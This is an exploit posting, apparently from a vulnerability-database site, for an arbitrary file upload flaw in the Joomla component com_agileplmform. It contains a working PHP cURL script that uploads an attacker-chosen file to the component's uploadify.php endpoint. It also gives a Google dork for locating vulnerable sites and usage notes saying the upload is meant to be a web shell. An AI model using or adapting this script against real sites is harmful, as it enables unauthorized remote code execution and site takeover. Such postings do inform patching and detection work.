Exploit: Joomla com_agileplmform file upload vulnerability ( Ascii Version )

Search:
WLB2

Joomla com_agileplmform file upload vulnerability

Published
Credit
Risk
2012.08.04
Tunisian spl01t3r
High
CWE
CVE
Local
Remote
N/A
N/A ( Add )
No
Yes
 Dork: inurl:components/com_agileplmform

Plain text version

+----------------------------------------------------------------------+
# Exploit Title: joomla component com_agileplmform file upload vulnerability
# Google Dork: inurl:components/com_agileplmform
# Date: 04/08/2012
# Author: Tunisian spl01t3r


____ (_) ____ ___
( _ \| |( _ \ / _ \
| | | | || | | x |_|
| ||_/|_|| ||_/ \___/
|_| |_|
_
(_) ____ ____ ____ _____
| | / __| / __| \__ \ / ` \
| | \___ \ \___ \ / _ \_ | Y Y \
|_| |____/ |____/ (___ / |_|_| /
\/ \/
+----------------------------------------------------------------------+

[+] exploit



<?php
/* example of using
$uploadfile="C:\AppServ\www\Tunisia.php"; */
$uploadfile="C:\AppServ\www\b.php";
$ch = curl_init("http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/components/com_agileplmform/views/agileplmform/js/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

[+] how TO use
Tunisia.php must be the devil file 3:)
!!!shell!!!
TN> http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/
Filename : $postResult output

+----------------------------------------------------------------------+
[+] greetz to : BIbou sfaxien ; mech lazem ; tn_scorpion ; anas laaribi ;
jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
daly azrail ; med bradai ; 7rouz ; ghazy info ; mohamed bel ;
hassen ben mbarek ; prince bibou ; hag whag ; anis van toets
& all tn_spl01t3r's freinds
mAhna mAhna

[+] profile : www.facebook.com/TN.spl0it3r

+----------------------------------------------------------------------+

References:

http://www.facebook.com/TN.spl0it3r

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version